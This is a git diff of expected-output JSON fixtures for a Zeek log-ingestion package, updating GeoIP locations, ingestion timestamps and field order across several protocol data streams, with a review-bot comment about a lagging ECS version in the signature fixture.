"{\"ts\":1602116947.977,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":3,\"stratum\":0,\"poll\":1,\"precision\":1,\"root_delay\":0,\"root_disp\":0,\"ref_id\":\"\\\\x00\\\\x00\\\\x00\\\\x00\",\"ref_time\":0,\"org_time\":0,\"rec_time\":0,\"xmt_time\":1602116947.215,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -110,14 +110,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -151,14 +151,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -172,7 +172,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:06.504154100Z", + "ingested": "2021-12-14T14:59:18.281286584Z", "original": "{\"ts\":1602116948.081,\"uid\":\"CqlPpF1AQVLMPgGiL5\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":38461,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":123,\"version\":4,\"mode\":4,\"stratum\":2,\"poll\":8,\"precision\":5.960464477539063e-8,\"root_delay\":0.00921630859375,\"root_disp\":0.0212249755859375,\"ref_id\":\"127.67.113.92\",\"ref_time\":1602116655.942,\"org_time\":1602116947.215,\"rec_time\":1602116947.964,\"xmt_time\":1602116947.964,\"num_exts\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json index 1884e9707ab..7efdea21459 100644 --- a/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json +++ b/packages/zeek/data_stream/ocsp/_dev/test/pipeline/test-ocsp.log-expected.json 
@@ -27,7 +27,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066331400Z", + "ingested": "2021-12-14T14:59:18.777548722Z", "original": "{\"ts\":1307712421.847886,\"id\":\"FSEWoS3ff8FcTn3WLf\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"14A7E219F46B93E141258F08BC85764671F136B0\",\"issuerKeyHash\":\"EEDD79C0D379B04D7E47BC70A6E7C62AAEBADEC9\",\"serialNumber\":\"9239D5348F40D1695A745470E1F23F43\",\"certStatus\":\"revoked\",\"revoketime\":1300220120.0,\"thisUpdate\":1307640343.0,\"nextUpdate\":1307985943.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -63,7 +63,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066340100Z", + "ingested": "2021-12-14T14:59:18.777551187Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" @@ -107,7 +107,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.066346600Z", + "ingested": "2021-12-14T14:59:18.777551613Z", "original": "{\"ts\":1307562416.100084,\"id\":\"FdZBFMEYgAErVhoC8\",\"hashAlgorithm\":\"sha1\",\"issuerNameHash\":\"6C2BC55AAF8D96BF60ADF81D023F23B48A0059C2\",\"issuerKeyHash\":\"A5EF0B11CEC04103A34A659048B21CE0572D7D47\",\"serialNumber\":\"30119E6EF41BDBA3FEFE711DBE8F6191\",\"certStatus\":\"good\",\"thisUpdate\":1307549998.0,\"nextUpdate\":1308154798.0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event" diff --git a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json index 099784ba16d..b31081bef9b 100644 --- a/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json 
+++ b/packages/zeek/data_stream/pe/_dev/test/pipeline/test-pe.log-expected.json @@ -32,7 +32,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.328453Z", + "ingested": "2021-12-14T14:59:19.055069231Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" @@ -87,7 +87,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:07.328459900Z", + "ingested": "2021-12-14T14:59:19.055072192Z", "original": "{\"ts\":1507565599.578328,\"id\":\"FtIFnm3ZqI1s96P74l\",\"machine\":\"I386\",\"compile_ts\":1467139314.0,\"os\":\"Windows XP\",\"subsystem\":\"WINDOWS_CUI\",\"is_exe\":true,\"is_64bit\":false,\"uses_aslr\":true,\"uses_dep\":true,\"uses_code_integrity\":false,\"uses_seh\":true,\"has_import_table\":true,\"has_export_table\":false,\"has_cert_table\":true,\"has_debug_data\":false,\"section_names\":[\".text\",\".rdata\",\".data\",\".rsrc\",\".reloc\"]}", "category": [ "file" diff --git a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json index 64282c8e9aa..5cc87b60c38 100644 --- a/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json +++ b/packages/zeek/data_stream/radius/_dev/test/pipeline/test-radius.log-expected.json @@ -1,6 +1,19 @@ { "expected": [ { + "@timestamp": "2008-08-01T22:52:17.916Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "user": [ + "John.McGuirk" + ], + "ip": [ + "10.0.0.1", + "10.0.0.100" + ] + }, "destination": { "port": 1812, "address": "10.0.0.100", 
@@ -19,29 +32,8 @@ "address": "10.0.0.1", "ip": "10.0.0.1" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "radius", - "community_id": "1:3SdDgWXPnheV2oGfVmxQjfwtr8E=", - "transport": "udp" - }, - "@timestamp": "2008-08-01T22:52:17.916Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "user": [ - "John.McGuirk" - ], - "ip": [ - "10.0.0.1", - "10.0.0.100" - ] - }, "event": { - "ingested": "2021-12-09T13:51:07.578196900Z", + "ingested": "2021-12-14T14:59:19.314695081Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -58,6 +50,14 @@ }, "user": { "name": "John.McGuirk" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "radius", + "community_id": "1:3SdDgWXPnheV2oGfVmxQjfwtr8E=", + "transport": "udp" } }, { @@ -109,7 +109,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:07.578205400Z", + "ingested": "2021-12-14T14:59:19.314699063Z", "original": "{\"ts\":1217631137.916736,\"uid\":\"CRe9VD3flCDWbPmpIh\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":1645,\"id.resp_h\":\"10.0.0.100\",\"id.resp_p\":1812,\"username\":\"John.McGuirk\",\"mac\":\"00:14:22:e9:54:5e\",\"result\":\"success\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json index 03bd4ffb157..6562e2dbe71 100644 --- a/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json +++ b/packages/zeek/data_stream/rdp/_dev/test/pipeline/test-rdp.log-expected.json 
@@ -1,6 +1,16 @@ { "expected": [ { + "@timestamp": "2019-09-10T16:18:59.668Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.131.1", + "192.168.131.131" + ] + }, "destination": { "port": 3389, "address": "192.168.131.131", @@ -17,34 +27,16 @@ "ssl": true } }, + "tls": { + "established": true + }, "source": { "port": 33872, "address": "192.168.131.1", "ip": "192.168.131.1" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "rdp", - "community_id": "1:PsQu6lSZioPVi0A5K7UaeGsVqS0=", - "transport": "tcp" - }, - "@timestamp": "2019-09-10T16:18:59.668Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.131.1", - "192.168.131.131" - ] - }, - "tls": { - "established": true - }, "event": { - "ingested": "2021-12-09T13:51:07.959730500Z", + "ingested": "2021-12-14T14:59:19.676106597Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -56,6 +48,14 @@ "protocol", "info" ] + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "rdp", + "community_id": "1:PsQu6lSZioPVi0A5K7UaeGsVqS0=", + "transport": "tcp" } }, { @@ -110,7 +110,7 @@ "established": true }, "event": { - "ingested": "2021-12-09T13:51:07.959740Z", + "ingested": "2021-12-14T14:59:19.676109106Z", "original": "{\"ts\":1568132339.668952,\"uid\":\"C2PcYV7D3ntaHm056\",\"id.orig_h\":\"192.168.131.1\",\"id.orig_p\":33872,\"id.resp_h\":\"192.168.131.131\",\"id.resp_p\":3389,\"result\":\"encrypted\",\"security_protocol\":\"HYBRID\",\"cert_count\":0,\"ssl\":true}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
diff --git a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json index 833175657c7..f1157551473 100644 --- a/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json +++ b/packages/zeek/data_stream/rfb/_dev/test/pipeline/test-rfb.log-expected.json @@ -45,7 +45,7 @@ "ip": "192.168.1.123" }, "event": { - "ingested": "2021-12-09T13:51:08.328387900Z", + "ingested": "2021-12-14T14:59:20.028017778Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -128,7 +128,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:08.328393600Z", + "ingested": "2021-12-14T14:59:20.028020108Z", "original": "{\"ts\":1328632534.517208,\"uid\":\"CXoIzM3wH3fUwXtKN1\",\"id.orig_h\":\"192.168.1.123\",\"id.orig_p\":58102,\"id.resp_h\":\"192.168.1.10\",\"id.resp_p\":5900,\"client_major_version\":\"003\",\"client_minor_version\":\"008\",\"server_major_version\":\"003\",\"server_minor_version\":\"008\",\"authentication_method\":\"VNC\",\"auth\":true,\"share_flag\":false,\"desktop_name\":\"\\u00a0\",\"width\":800,\"height\":600}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json index 84863c54ea1..86c5ff5983d 100644 --- a/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json 
+++ b/packages/zeek/data_stream/signature/_dev/test/pipeline/test-signature.log-expected.json @@ -1,17 +1,26 @@ { "expected": [ { + "@timestamp": "2021-01-28T16:53:29.869Z", + "ecs": { + "version": "1.10.0" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -38,14 +47,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -58,28 +67,19 @@ "port": 51617, "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "network": { - "type": "ipv4" - }, - "@timestamp": "2021-01-28T16:53:29.869Z", - "ecs": { - "version": "1.10.0" - }, - "related": { - "ip": [ - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:08.678071800Z", + "ingested": "2021-12-14T14:59:20.383852825Z", "original": "{\"ts\": 1611852809.869245,\"uid\": \"CbjAXE4CBxJ8W7VoJg\",\"src_addr\": \"89.160.20.156\",\"src_port\": 51617,\"dst_addr\": \"89.160.20.156\",\"dst_port\": 445,\"note\": \"Signatures::Sensitive_Signature\",\"sig_id\": \"my-second-sig\",\"event_msg\": \"89.160.20.156: TCP traffic\",\"sub_msg\": \"\"}", "id": "CbjAXE4CBxJ8W7VoJg", "category": "network", "created": "2020-04-28T11:07:58.223Z", "kind": "alert" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "type": "ipv4" } } ] 
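Review bot: On the new side of the first hunk the signature fixture carries `"version": "1.10.0"` under `ecs`, while every other zeek fixture in this change reports `1.12.0`. That value is emitted by the data stream's pipeline, not by this generated file, so the mismatch presumably means the signature pipeline's ECS version was not bumped together with the rest of the package; if the lag is intentional, a one-line note in the package changelog would save the next reader the comparison. The moved `tags`/`network` blocks in the later hunks are reordering only and need no action.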
diff --git a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json index 8ee74f2db18..7ec0abcd06c 100644 --- a/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json +++ b/packages/zeek/data_stream/sip/_dev/test/pipeline/test-sip.log-expected.json @@ -1,17 +1,27 @@ { "expected": [ { + "@timestamp": "2013-02-26T22:02:39.055Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "172.16.133.19", + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -62,29 +72,8 @@ "address": "172.16.133.19", "ip": "172.16.133.19" }, - "url": { - "full": "sip:newyork.voip.ms:5060" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=", - "transport": "udp" - }, - "@timestamp": "2013-02-26T22:02:39.055Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "172.16.133.19", - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041817900Z", + "ingested": "2021-12-14T14:59:20.758597365Z", "original": "{\"ts\":1361916159.055464,\"uid\":\"CPRLCB4eWHdjP852Bk\",\"id.orig_h\":\"172.16.133.19\",\"id.orig_p\":5060,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:newyork.voip.ms:5060\",\"request_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"request_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_from\":\"\\u0022AppNeta\\u0022 \u003csip:116954_Boston6@newyork.voip.ms\u003e\",\"response_to\":\"\u003csip:116954_Boston6@newyork.voip.ms\u003e;tag=as023f66a5\",\"call_id\":\"8694cd7e-976e4fc3-d76f6e38@172.16.133.19\",\"seq\":\"4127 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"response_path\":[\"SIP/2.0/UDP 172.16.133.19:5060\"],\"user_agent\":\"PolycomSoundStationIP-SSIP_5000-UA/3.2.4.0267\",\"status_code\":401,\"status_msg\":\"Unauthorized\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -99,20 +88,40 @@ "error" ], "outcome": "failure" + }, + "url": { + "full": "sip:newyork.voip.ms:5060" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:qeURsPuZXF8ataWohrLnhZFa7/c=", + "transport": "udp" } }, { + "@timestamp": "2005-01-14T17:58:02.965Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -164,14 +173,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -184,6 +193,22 @@ "port": 5061, "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:59:20.758599867Z", + "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", + "created": "2020-04-28T11:07:58.223Z", + "kind": "event", + "action": "INVITE", + "id": "ComJz236lSOcuOmix3", + "category": [ + "network" + ], + "type": [ + "connection", + "protocol" + ], + "outcome": "success" + }, "url": { "full": "sip:francisco@bestel.com:55060" }, @@ -194,8 +219,10 @@ "protocol": "sip", "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", "transport": "udp" - }, - "@timestamp": "2005-01-14T17:58:02.965Z", + } + }, + { + "@timestamp": "2005-01-14T17:58:07.022Z", "ecs": { "version": "1.12.0" }, 
@@ -204,35 +231,17 @@ "89.160.20.156" ] }, - "event": { - "ingested": "2021-12-09T13:51:09.041826300Z", - "original": "{\"ts\":1105725482.965944,\"uid\":\"ComJz236lSOcuOmix3\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"INVITE\",\"uri\":\"sip:francisco@bestel.com:55060\",\"request_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"request_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e\",\"response_from\":\"\u003csip:89.160.20.156:55061;user=phone\u003e\",\"response_to\":\"\\u0022francisco@bestel.com\\u0022 \u003csip:francisco@bestel.com:55060\u003e;tag=298852044\",\"call_id\":\"12013223@89.160.20.156\",\"seq\":\"1 INVITE\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\",\"SIP/2.0/UDP 89.160.20.156\",\"SIP/2.0/UDP 89.160.20.156:55061\"],\"status_code\":180,\"status_msg\":\"Ringing\",\"request_body_len\":229,\"response_body_len\":0}", - "created": "2020-04-28T11:07:58.223Z", - "kind": "event", - "action": "INVITE", - "id": "ComJz236lSOcuOmix3", - "category": [ - "network" - ], - "type": [ - "connection", - "protocol" - ], - "outcome": "success" - } - }, - { "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
@@ -281,14 +290,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -301,28 +310,8 @@ "port": 5061, "ip": "89.160.20.156" }, - "url": { - "full": "sip:Verso.com" - }, - "tags": [ - "preserve_original_event" - ], - "network": { - "protocol": "sip", - "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", - "transport": "udp" - }, - "@timestamp": "2005-01-14T17:58:07.022Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156" - ] - }, "event": { - "ingested": "2021-12-09T13:51:09.041832Z", + "ingested": "2021-12-14T14:59:20.758600362Z", "original": "{\"ts\":1105725487.022577,\"uid\":\"CJZDWgixtwqXctWEg\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5061,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"REGISTER\",\"uri\":\"sip:Verso.com\",\"request_from\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"request_to\":\"Ivan \u003csip:Ivan@Verso.com\u003e\",\"response_from\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"response_to\":\"\\u0022Ivan\\u0022 \u003csip:Ivan@Verso.com\u003e\",\"call_id\":\"46E1C3CB36304F84A020CF6DD3F96461@Verso.com\",\"seq\":\"37764 REGISTER\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;rport\"],\"response_path\":[\"SIP/2.0/UDP 89.160.20.156:5061;received=89.160.20.156;rport=5061\"],\"user_agent\":\"Verso Softphone release 1104w\",\"status_code\":200,\"status_msg\":\"OK\",\"request_body_len\":0,\"response_body_len\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", 
@@ -336,9 +325,30 @@ "protocol" ], "outcome": "success" + }, + "url": { + "full": "sip:Verso.com" + }, + "tags": [ + "preserve_original_event" + ], + "network": { + "protocol": "sip", + "community_id": "1:epsmqZ4+HVOOBLHj+vSEzlRIwbM=", + "transport": "udp" } }, { + "@timestamp": "2021-03-30T15:50:16.928Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156", + "10.156.0.2" + ] + }, "destination": { "port": 5060, "address": "10.156.0.2", @@ -371,14 +381,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -391,6 +401,21 @@ "port": 5083, "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:59:20.758600762Z", + "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", + "created": "2020-04-28T11:07:58.223Z", + "kind": "event", + "action": "OPTIONS", + "id": "CR6XQH1Lf2mF9YG7H2", + "category": [ + "network" + ], + "type": [ + "connection", + "protocol" + ] + }, "url": { "full": "sip:100@89.160.20.156" }, 
@@ -401,8 +426,10 @@ "protocol": "sip", "community_id": "1:eAmnybkUlcgqIMU6KMfWi3X/b84=", "transport": "udp" - }, - "@timestamp": "2021-03-30T15:50:16.928Z", + } + }, + { + "@timestamp": "2021-03-30T15:58:43.416Z", "ecs": { "version": "1.12.0" }, @@ -412,23 +439,6 @@ "10.156.0.2" ] }, - "event": { - "ingested": "2021-12-09T13:51:09.041835200Z", - "original": "{\"ts\":1617119416.928735,\"uid\":\"CR6XQH1Lf2mF9YG7H2\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":5083,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":5060,\"trans_depth\":0,\"method\":\"OPTIONS\",\"uri\":\"sip:100@89.160.20.156\",\"request_from\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"request_to\":\"\\\"sipvicious\\\"\u003csip:90501@1.1.1.1\u003e\",\"call_id\":\"767538559354206383610151\",\"seq\":\"1 OPTIONS\",\"request_path\":[\"SIP/2.0/UDP 89.160.20.156:5083\"],\"response_path\":[],\"user_agent\":\"friendly-scanner\",\"request_body_len\":0}", - "created": "2020-04-28T11:07:58.223Z", - "kind": "event", - "action": "OPTIONS", - "id": "CR6XQH1Lf2mF9YG7H2", - "category": [ - "network" - ], - "type": [ - "connection", - "protocol" - ] - } - }, - { "destination": { "port": 5060, "address": "10.156.0.2", @@ -461,14 +471,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { 
